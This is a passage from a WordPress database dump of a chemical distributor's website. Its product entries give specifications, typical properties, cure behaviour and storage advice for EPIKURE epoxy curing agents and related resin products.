valign="top" width="63"></td>\r\n<td valign="top" width="75">\r\n<p align="center"><b>3200</b></p>\r\n<p align="center"><b>AEP</b></p>\r\n</td>\r\n<td valign="top" width="67">\r\n<p align="center"><b>3223</b></p>\r\n<p align="center"><b>DETA</b></p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center"><b>3234</b></p>\r\n<p align="center"><b>TETA</b></p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center"><b>3245</b></p>\r\n<p align="center"><b>TEPA</b></p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="176"><strong>Property</strong></td>\r\n<td valign="top" width="63">\r\n<p align="center"><strong>Units</strong></p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center"><strong>Value</strong></p>\r\n</td>\r\n<td valign="top" width="67">\r\n<p align="center"><strong>Value</strong></p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center"><strong>Value</strong></p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center"><strong>Value</strong></p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center"><strong>Test Method/Standard</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="176"><strong>Amine value</strong></td>\r\n<td valign="top" width="63">\r\n<p align="center">mg/g</p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center">1,275 – 1,325</p>\r\n</td>\r\n<td valign="top" width="67">\r\n<p align="center">1,580 – 1,850</p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center">1,410 – 1,460</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">1,290 – 1,375</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">ASTM D2896</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="176"><strong>Color</strong></td>\r\n<td valign="top" width="63">\r\n<p align="center">Pt-Co</p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center"><span class="GramE">200 max.</span></p>\r\n</td>\r\n<td valign="top" width="67">\r\n<p align="center"><span class="GramE">30 max.</span></p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center"><span class="GramE">50 max.</span></p>\r\n</td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="156">\r\n<p align="center">ASTM D1209</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="176"><strong>Color</strong></td>\r\n<td valign="top" width="63">\r\n<p align="center">Gardner</p>\r\n</td>\r\n<td valign="top" width="75"></td>\r\n<td valign="top" width="67"></td>\r\n<td valign="top" width="75"></td>\r\n<td valign="top" width="72">\r\n<p align="center"><span class="GramE">2 max.</span></p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">ASTM D1544</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="176"><strong>Water</strong></td>\r\n<td valign="top" width="63">\r\n<p align="center">% wt.</p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center"><span class="GramE">0.5 max.</span></p>\r\n</td>\r\n<td valign="top" width="67">\r\n<p align="center"><span class="GramE">0.5 max.</span></p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center"><span class="GramE">0.5 max.</span></p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center"><span class="GramE">0.5 max.</span></p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">ASTM E1064</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="176"><strong>Purity</strong></td>\r\n<td valign="top" width="63">\r\n<p align="center">% wt.</p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center">98.0</p>\r\n</td>\r\n<td valign="top" width="67">\r\n<p align="center">98.5</p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center">96.0</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">95.0</p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Typical Properties</strong>\r\n<table style="height: 342px;" border="1" width="858" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="180"></td>\r\n<td valign="top" width="60"></td>\r\n<td valign="top" width="72">\r\n<p align="center"><b>3200</b></p>\r\n<p align="center"><b>AEP</b></p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center"><b>3223</b></p>\r\n<p align="center"><b>DETA</b></p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center"><b>3234</b></p>\r\n<p align="center"><b>TETA</b></p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center"><b>3245</b></p>\r\n<p align="center"><b>TEPA</b></p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="180">Property</td>\r\n<td valign="top" width="60">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="180">Viscosity at 20°C</td>\r\n<td valign="top" width="60">\r\n<p align="center">cP</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">20</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">10</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">25</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">100</p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="180">Equivalent weight, approx.</td>\r\n<td valign="top" width="60"></td>\r\n<td valign="top" width="72">\r\n<p align="center">43</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">20.7</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">24.5</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">27.2</p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="180">Density @ 20 °C</td>\r\n<td valign="top" width="60">\r\n<p align="center">g/ml</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">0.98</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">0.95</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">0.98</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">0.99</p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="180">Boiling Point, 760 mm Hg</td>\r\n<td valign="top" width="60">\r\n<p align="center">°C</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">222</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">207</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">227</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">Decomp.</p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="180">Flash Point</td>\r\n<td valign="top" width="60">\r\n<p align="center">°C</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">215</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">210</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">275</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">280</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">ASTM D56</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="180">Mix Ratio, EEW 190 epoxy</td>\r\n<td valign="top" width="60">\r\n<p align="center">phr</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">22.7</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">10.9</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">12.9</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">14.3</p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\nStorage:\r\n\r\nTo preserve Epikure 3245 product quality and prevent discoloration, it is recommended that a nitrogen blanket be maintained on the headspace of an opened container and that storage / handling temperatures in excess of 50°C (122°F) be avoided. Spillage around the opening of the container from dispensing operations will form a crystalline residue. This residue is not soluble in the curing agent <span class="GramE">nor</span> the resin, and certain measures should be taken to prevent it from contaminating the remaining contents of the container. The crystalline residue should be removed with a warm damp wash cloth PRIOR to re-opening the container for dispensing.\r\n\r\n&nbsp;\r\n\r\nMiller-Stephenson is an Epon, Epikure, Eponex, and Heloxy Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>', 'EPIKURE™ 3245', 'EPIKURE™ Curing Agents 3200, 3223, 3234, and 3245 are unmodified aliphatic amines. They are used in a variety of applications including epoxy curing agents. Due to their tendency to form complexes with atmospheric carbon dioxide, particularly in humid conditions, they are most often formulated, adducted or otherwise reacted to inhibit amine blush. Application Include:\r\n<ul>\r\n 	<li>Epoxy curing agents</li>\r\n 	<li>Polyamides for inks and adhesives</li>\r\n 	<li>Wet strength resins</li>\r\n 	<li>Corrosion inhibitors</li>\r\n 	<li>Oil and fuel additives</li>\r\n 	<li>Chelating agents</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3245', '', '', '2016-11-23 19:41:30', '2016-11-23 19:41:30', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1187', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1188, 2, '2016-09-02 14:12:36', '2016-09-02 14:12:36', '', 'miller-stephenson-banner', '', 'inherit', 'open', 'closed', '', 'miller-stephenson-banner', '', '', '2016-09-02 16:41:14', '2016-09-02 16:41:14', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/miller-stephenson-banner.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1189, 3, '2016-09-02 15:08:39', '2016-09-02 15:08:39', '', 'EPIKURE™ 3271', 'EPIKURE™ Curing Agent 3271 is a modified aliphatic amine, low to moderate viscosity, fastsetting, high temperature resistant epoxy curing agent.  Benefits include:\r\n<ul>\r\n 	<li>Low viscosity; Fast-setting</li>\r\n 	<li>High heat distortion temperatures</li>\r\n 	<li>Modest blush resistance</li>\r\n 	<li>Excellent chemical resistance</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3271', '', '', '2016-09-23 17:22:58', '2016-09-23 17:22:58', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1189', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1190, 3, '2016-09-02 15:08:11', '2016-09-02 15:08:11', '', '3271', '', 'inherit', 'open', 'closed', '', '3271', '', '', '2016-09-02 15:08:11', '2016-09-02 15:08:11', '', 1189, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/3271.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1191, 3, '2016-09-02 15:33:15', '2016-09-02 15:33:15', '', 'EPIKURE™ 3274', 'EPIKURE™ Curing Agent 3274, a moderately reactive, low viscosity aliphatic amine, is water insensitive and resists “blushing” “bloom’’ and “sweat-out” in epoxy compositions cured in high humidity environments. Other features are light color, improved color retention as compared to conventional amine cured epoxy systems, and long pot life. Benefits include:\r\n<ul>\r\n 	<li>Low color</li>\r\n 	<li>Blush free</li>\r\n 	<li>Sweat free</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3274', '', '', '2016-09-23 17:22:50', '2016-09-23 17:22:50', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1191', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1192, 3, '2016-09-02 15:31:46', '2016-09-02 15:31:46', '', '3274', '', 'inherit', 'open', 'closed', '', '3274', '', '', '2016-09-02 15:31:46', '2016-09-02 15:31:46', '', 1191, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/3274.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1193, 3, '2016-09-02 15:42:13', '2016-09-02 15:42:13', '<p class="Section1">EPIKURE 3282, a very reactive modified aliphatic amine adduct, has been developed for applications where relatively short cure periods at room temperature are required.</p>\r\n<p class="Section1"> <strong>Application Areas/Suggested Uses</strong></p>\r\n\r\n<div class="Section1">\r\n<ul>\r\n 	<li>Tooling gel coats</li>\r\n 	<li>Laminating compounds</li>\r\n 	<li>Adhesives</li>\r\n</ul>\r\n</div>\r\nCompositions based on <strong><a href="https://www.miller-stephenson.com/product/epon-828/">EPON™ Resin 828</a></strong> and EPIKURE 3282 cure readily at room temperature. The pot life of such compositions is highly dependent on the volume of the mixture, temperature, amount and type of filler loading, and, to a lesser extent, the presence of a reactive diluent. An indication of the reactivity of several unfilled systems under varying conditions is presented in Table 1.\r\n\r\nEPIKURE Curing Agent 3282 is normally used at a weight ratio of 20 parts per 100 parts of liquid epoxy resin. Thin sections, where exothermic heat is readily dissipated, require 4 to 8 hours for the composition to cure to handling strength. The composition reaches full cure after 4 to 7 days. Thin sections may be cured rapidly at moderately elevated temperatures, but thick sections should be allowed to exotherm before heat is applied. The maximum thickness recommended for an unfilled composition is approximately 1/2 inch. Maximum high temperature properties are obtained with a post cure of about 2 hours at 93 to 121 °C.\r\n<table border="0" cellspacing="0" cellpadding="0">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="600">Table 1 / <strong>Reactivity of compositions containing EPIKURE™ Curing Agent 3282</strong></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<table style="height: 149px;" border="0" width="886" cellspacing="0" cellpadding="0">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="192">&nbsp;</td>\r\n<td valign="top" width="60">\r\n<p align="center"><u><strong>Units</strong></u></p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center"><u><strong>A</strong></u></p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center"><u><strong>B</strong></u></p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center"><u><strong>C</strong></u></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="192"><strong><a href="https://www.miller-stephenson.com/product/epon-828/">EPON™ Resin 828</a></strong></td>\r\n<td valign="top" width="60">\r\n<p align="center">pbw</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">100</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">---</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">80</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="192">EPON Resin 815</td>\r\n<td valign="top" width="60">\r\n<p align="center">pbw</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">---</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">100</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">---</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="192">HELOXY™ Modifier 61</td>\r\n<td valign="top" width="60">\r\n<p align="center">pbw</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">---</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">---</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">20</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="192">EPIKURE 3282</td>\r\n<td valign="top" width="60">\r\n<p align="center">pbw</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">20</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">20</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">20</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\nHandling Properties:\r\n<table style="height: 309px;" border="0" width="884" cellspacing="0" cellpadding="0">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="119">\r\n<p align="center"></p>\r\n<p align="center">Weight,</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center"></p>\r\n<p align="center">Thickness,</p>\r\n</td>\r\n<td valign="top" width="60">\r\n<p align="center">Gel Time,</p>\r\n</td>\r\n<td colspan="2" valign="top" width="96">\r\n<p align="center">Maximum Exotherm,</p>\r\n</td>\r\n<td valign="top" width="57">\r\n<p align="center">Gel Time,</p>\r\n</td>\r\n<td colspan="2" valign="top" width="99">\r\n<p align="center">Maximum Exotherm,</p>\r\n</td>\r\n<td valign="top" width="57">\r\n<p align="center">Gel Time,</p>\r\n</td>\r\n<td colspan="2" valign="top" width="99">\r\n<p align="center">Maximum Exotherm,</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2" valign="top" width="125">\r\n<p align="center"><u>grams</u></p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center"><u>inch</u></p>\r\n</td>\r\n<td valign="top" width="60">\r\n<p align="center"><u>min.</u></p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center"><u>°F</u></p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center"><u>°C</u></p>\r\n</td>\r\n<td valign="top" width="57">\r\n<p align="center"><u>min.</u></p>\r\n</td>\r\n<td valign="top" width="51">\r\n<p align="center"><u>°F</u></p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center"><u>°C</u></p>\r\n</td>\r\n<td valign="top" width="57">\r\n<p align="center"><u>min.</u></p>\r\n</td>\r\n<td valign="top" width="51">\r\n<p align="center"><u>°F</u></p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center"><u>°C</u></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2" valign="top" width="125">\r\n<p align="center">100</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">2</p>\r\n</td>\r\n<td valign="top" width="60">\r\n<p align="center">15</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">400</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">204</p>\r\n</td>\r\n<td valign="top" width="57">\r\n<p align="center">16</p>\r\n</td>\r\n<td valign="top" width="51">\r\n<p align="center">385</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">196</p>\r\n</td>\r\n<td valign="top" width="57">\r\n<p align="center">17</p>\r\n</td>\r\n<td valign="top" width="51">\r\n<p align="center">375</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">191</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2" valign="top" width="125">\r\n<p align="center">50</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">1</p>\r\n</td>\r\n<td valign="top" width="60">\r\n<p align="center">16</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">350</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">177</p>\r\n</td>\r\n<td valign="top" width="57">\r\n<p align="center">18</p>\r\n</td>\r\n<td valign="top" width="51">\r\n<p align="center">315</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">157</p>\r\n</td>\r\n<td valign="top" width="57">\r\n<p align="center">24</p>\r\n</td>\r\n<td valign="top" width="51">\r\n<p align="center">300</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">149</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2" valign="top" width="125">\r\n<p align="center">25</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">1</p>\r\n</td>\r\n<td valign="top" width="60">\r\n<p align="center">19</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">320</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">160</p>\r\n</td>\r\n<td valign="top" width="57">\r\n<p align="center">22</p>\r\n</td>\r\n<td valign="top" width="51">\r\n<p align="center">270</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">132</p>\r\n</td>\r\n<td valign="top" width="57">\r\n<p align="center">31</p>\r\n</td>\r\n<td valign="top" width="51">\r\n<p align="center">225</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">107</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2" valign="top" width="125">\r\n<p align="center">10</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">3/16</p>\r\n</td>\r\n<td valign="top" width="60">\r\n<p align="center">90</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">93</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">34</p>\r\n</td>\r\n<td valign="top" width="57">\r\n<p align="center">120</p>\r\n</td>\r\n<td valign="top" width="51">\r\n<p align="center">77*</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">25*</p>\r\n</td>\r\n<td valign="top" width="57">\r\n<p align="center">150</p>\r\n</td>\r\n<td valign="top" width="51">\r\n<p align="center">77*</p>\r\n</td>\r\n<td valign="top" width="48">\r\n<p align="center">25*</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\nMiller-Stephenson is an Epon, Epikure Curing Agent, Eponex, and Heloxy Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>', 'EPIKURE™ 3282', 'EPIKURE™ Curing Agent 3282, a very reactive modified aliphatic amine adduct, has been developed for applications where relatively short cure periods at room temperature are required. EPIKURE Curing Agent 3282 is normally used at a weight ratio of 20 parts per 100 parts of liquid epoxym resin. Thin sections, where exothermic heat is readily dissipated, require 4 to 8 hours for the composition to cure to handling strength. The composition reaches full cure after 4 to 7 days.', 'publish', 'open', 'closed', '', 'epikure-3282', '', '', '2016-11-17 16:22:20', '2016-11-17 16:22:20', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1193', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1194, 3, '2016-09-02 15:41:33', '2016-09-02 15:41:33', '', '3282', '', 'inherit', 'open', 'closed', '', '3282', '', '', '2016-09-02 15:41:33', '2016-09-02 15:41:33', '', 1193, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/3282.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1198, 3, '2016-09-02 17:16:27', '2016-09-02 17:16:27', '', 'EPIKURE™ 3290', 'EPIKURE™ Curing Agent 3290 is a modified aliphatic amine, light colored, low viscosity epoxy curing agent. Systems cured with EPIKURE 3290 exhibit excellent solvent resistance. Mix ratios are less critical than standard polyamines. Benefits include:\r\n<ul>\r\n 	<li>Reduced vapor pressure</li>\r\n 	<li>Low shrinkage</li>\r\n 	<li>Less critical mix ratios</li>\r\n 	<li>Good chemical resistance</li>\r\n 	<li>Low mixed viscosity</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3290', '', '', '2016-09-23 17:22:31', '2016-09-23 17:22:31', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1198', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1200, 2, '2016-09-02 17:12:18', '2016-09-02 17:12:18', '', 'release-agents-releasys', '', 'inherit', 'open', 'closed', '', 'release-agents-releasys-3', '', '', '2016-09-02 17:12:29', '2016-09-02 17:12:29', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/release-agents-releasys-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1201, 3, '2016-09-02 17:15:39', '2016-09-02 17:15:39', '', '3290', '', 'inherit', 'open', 'closed', '', '3290', '', '', '2016-09-02 17:15:39', '2016-09-02 17:15:39', '', 1198, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/3290.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1205, 2, '2016-09-02 17:27:54', '2016-09-02 17:27:54', '', 'miller-stephenson-release-agents', '', 'inherit', 'open', 'closed', '', 'miller-stephenson-release-agents', '', '', '2016-09-02 17:28:24', '2016-09-02 17:28:24', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/miller-stephenson-release-agents.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1208, 2, '2016-09-02 17:30:08', '2016-09-02 17:30:08', '', 'PTFE-RELEASE-AGENTS', '', 'inherit', 'open', 'closed', '', 'ptfe-release-agents', '', '', '2016-09-02 17:30:08', '2016-09-02 17:30:08', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/PTFE-RELEASE-AGENTS.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1209, 3, '2016-09-02 17:35:48', '2016-09-02 17:35:48', '', 'EPIKURE™ 3295', 'EPIKURE™ Curing Agent 3295, a very low viscosity aliphatic amine adduct, is recommended for curing epoxy resins at room or moderately elevated temperatures. Its reduced vapor pressure, less critical combining ratio, superior electrical properties, and non-fuming characteristics make it safer and more convenient to handle than the aliphatic polyamines such as diethylenetriamine. EPIKURE 3295 is ideally suited for many casting, laminating, and impregnation operations and certain coating applications. It can be diluted with water and is useful as a curing agent for aqueous resin systems. Applications include:\r\n<ul>\r\n 	<li>Brush head potting compounds</li>\r\n 	<li>Laminated and cast tooling</li>\r\n 	<li>High-build maintenance coatings</li>\r\n 	<li>Water-dilutable adhesives</li>\r\n</ul>\r\n&nbsp;', 'publish', 'open', 'closed', '', 'epikure-3295', '', '', '2016-09-23 17:22:23', '2016-09-23 17:22:23', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1209', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1210, 2, '2016-09-02 17:32:16', '2016-09-02 17:32:16', '', 'High-temperature-release-agents', '', 'inherit', 'open', 'closed', '', 'high-temperature-release-agents', '', '', '2016-09-02 17:32:35', '2016-09-02 17:32:35', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/High-temperature-release-agents.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1211, 3, '2016-09-02 17:34:51', '2016-09-02 17:34:51', '', '3295', '', 'inherit', 'open', 'closed', '', '3295', '', '', '2016-09-02 17:34:51', '2016-09-02 17:34:51', '', 1209, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/3295.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1212, 3, '2016-09-02 18:04:34', '2016-09-02 18:04:34', '', 'HELOXY™ 116', 'HELOXY 116 Modifier is a commercial grade of 2-ethylhexyl glycidyl ether. A low viscosity, almost colorless monoepoxide, its primary use is the viscosity reducing modification of epoxy resin formulations. Benefits include:\r\n<ul>\r\n 	<li>Efficient viscosity reduction of conventional epoxy resins</li>\r\n 	<li>Excellent substrate and filler wetting characteristics</li>\r\n 	<li>Low volatility relative to other members of monoepoxide class</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'heloxy-116', '', '', '2016-09-21 15:15:52', '2016-09-21 15:15:52', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1212', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1213, 1, '2016-09-02 17:42:34', '2016-09-02 17:42:34', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" link="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent/" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n<h4 class="alt-font "><strong>Semi-Permanent\r\nMold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson\r\nExclusive Product\r\n\r\n<a class="button alt-button white" title="" href="../chemicals/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process.  Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-09-02 17:42:34', '2016-09-02 17:42:34', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
